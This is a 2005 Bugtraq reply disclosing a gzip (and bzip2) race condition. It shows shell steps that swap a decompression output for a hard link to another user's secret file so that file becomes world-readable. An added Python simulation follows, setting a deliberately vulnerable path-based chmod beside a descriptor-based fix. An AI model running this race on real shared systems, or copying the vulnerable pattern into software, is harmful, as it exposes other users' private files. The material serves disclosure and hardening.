[38387] in bugtraq
Re: gzip TOCTOU file-permissions vulnerability
daemon@ATHENA.MIT.EDU (Theodor Milkov)
Fri Apr 15 12:43:02 2005
Message-ID: <425E0F54.3060100@icdsoft.com>
Date: Thu, 14 Apr 2005 09:36:04 +0300
From: Theodor Milkov <zimage@icdsoft.com>
MIME-Version: 1.0
To: bugtraq@securityfocus.com
Cc: 303927@bugs.debian.org
In-Reply-To: <20050413154049.GA30175@kitenet.net>
Content-Type: text/plain; charset=windows-1251; format=flowed
Content-Transfer-Encoding: 7bit
Joey Hess wrote:
> Martin Pitt wrote:
<cut>
>>Maybe I understood you wrong, could you please give a small test case
>>which describes the vulnerability exactly?
>
>
> I'm a wimp, so I will use gdb instead of writing some real exploit to
> win the race.
It is quite easy to win the race when the file that's being decompressed
is big:
---
# adduser user-good
# adduser user-evil
# usermod -G src user-good
# usermod -G src user-evil
# mkdir /var/www/proj
# chown root.src /var/www/proj
# chmod 2775 /var/www/proj
user-good@zimage:/var/www/proj$ echo "Rather secret data" > secf.txt
user-good@zimage:/var/www/proj$ chmod 400 secf.txt
user-good@zimage:/var/www/proj$ ls -al secf.txt
-r-------- 1 user-good src 19 Apr 14 09:16 secf.txt
user-evil@zimage:/var/www/proj$ dd if=/dev/zero of=bigf.bin bs=1M count=256
user-evil@zimage:/var/www/proj$ gzip bigf.bin
user-evil@zimage:/var/www/proj$ chmod 666 bigf.bin.gz
user-evil@zimage:/var/www/proj$ ls -la secf.txt bigf.bin.gz
-rw-rw-rw- 1 user-evil src 260543 Apr 14 09:17 bigf.bin.gz
-r-------- 1 user-good src 19 Apr 14 09:16 secf.txt
user-evil@zimage:/var/www/proj$ cat secf.txt
cat: secf.txt: Permission denied
user-good@zimage:/var/www/proj$ gzip -d bigf.bin.gz
user-evil@zimage:/var/www/proj$ rm -f bigf.bin ; ln secf.txt bigf.bin
user-evil@zimage:/var/www/proj$ ls -la secf.txt bigf.bin
-rw-rw-rw- 2 user-good src 19 Apr 14 09:17 bigf.bin
-rw-rw-rw- 2 user-good src 19 Apr 14 09:17 secf.txt
user-evil@zimage:/var/www/proj$ cat secf.txt
Rather secret data
---
The time between the beginning of decompression and the unlink+delete was about
2 sec., and decompression finished about 7-8 seconds later.
The same was tested and applies to bzip2.
Best regards,
Theodor
--
Theodor Milkov
http://www.zimage.del.bg/
CCNA, CCNP, MCP
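As an added example (not gzip's code and not part of the post above), the following script replays the scenario in a temporary directory to show where a permission change lands when it is applied to the output *name* after the data is written, beside a variant that applies it to the open descriptor instead. The names `unsafe_finalize`, `safe_finalize` and `simulate_race` are hypothetical, the whole run uses one user and a 4 KiB stand-in for the large file, and it assumes a POSIX system with `fchmod` and hard links.

```python
"""Path-based vs descriptor-based permission copy after decompression.
Added example, not gzip's code; assumes POSIX (fchmod, hard links) and
runs entirely inside a temporary directory."""
import os
import stat
import tempfile


def unsafe_finalize(out_path, src_mode):
    """Vulnerable pattern: copy the source file's mode onto the output NAME.

    Whatever inode the name refers to at this instant receives the mode. If
    another user in a shared setgid directory has replaced the name with a
    hard link to a file of their choosing, that file is what gets opened up.
    """
    os.chmod(out_path, src_mode)


def safe_finalize(out_fd, out_path, src_mode):
    """Hardened pattern: operate on the descriptor we created, never the name.

    fchmod() can only affect the inode we opened, so a swapped name cannot
    redirect the permission change. The fstat/lstat comparison is a tamper
    check on top of that: it lets the caller refuse to finish and report a
    replaced output rather than silently leaving it behind. (The check alone
    would still be racy; the fd-based chmod is what removes the exposure.)
    Returns True if the mode was applied, False if tampering was detected.
    """
    fd_st = os.fstat(out_fd)
    name_st = os.lstat(out_path)
    if (fd_st.st_dev, fd_st.st_ino) != (name_st.st_dev, name_st.st_ino):
        return False
    os.fchmod(out_fd, src_mode)
    return True


def simulate_race(hardened, tamper):
    """Replay the post's sequence in a temp dir (single user, constructed data).

    Returns the final mode bits of the secret file and of the output name,
    plus whether the finalize step applied the mode.
    """
    with tempfile.TemporaryDirectory() as d:
        secret = os.path.join(d, "secf.txt")
        out = os.path.join(d, "bigf.bin")
        with open(secret, "w") as f:
            f.write("Rather secret data\n")  # constructed, mirrors the post
        os.chmod(secret, 0o400)

        # The decompressor creates its output privately and starts writing.
        fd = os.open(out, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
        try:
            os.write(fd, b"\0" * 4096)  # stand-in for the long decompression
            if tamper:
                # The rm + ln from the post, while the output is still open.
                os.unlink(out)
                os.link(secret, out)
            src_mode = 0o666  # mode of bigf.bin.gz in the post
            if hardened:
                applied = safe_finalize(fd, out, src_mode)
            else:
                unsafe_finalize(out, src_mode)
                applied = True
        finally:
            os.close(fd)

        return {
            "secret_mode": stat.S_IMODE(os.stat(secret).st_mode),
            "output_mode": stat.S_IMODE(os.lstat(out).st_mode),
            "applied": applied,
        }


if __name__ == "__main__":
    for hardened in (False, True):
        r = simulate_race(hardened=hardened, tamper=True)
        print("hardened" if hardened else "path-based", r)
```

With `tamper=True` the path-based variant leaves the secret file at mode 0666, exactly the outcome shown in the post's `ls -la`; the descriptor-based variant leaves it at 0400 and reports the swap. Any program that creates an output file and later adjusts its ownership or mode should do so through the descriptor it already holds (`fchmod`, `fchown`, `futimes`) rather than by re-resolving the name.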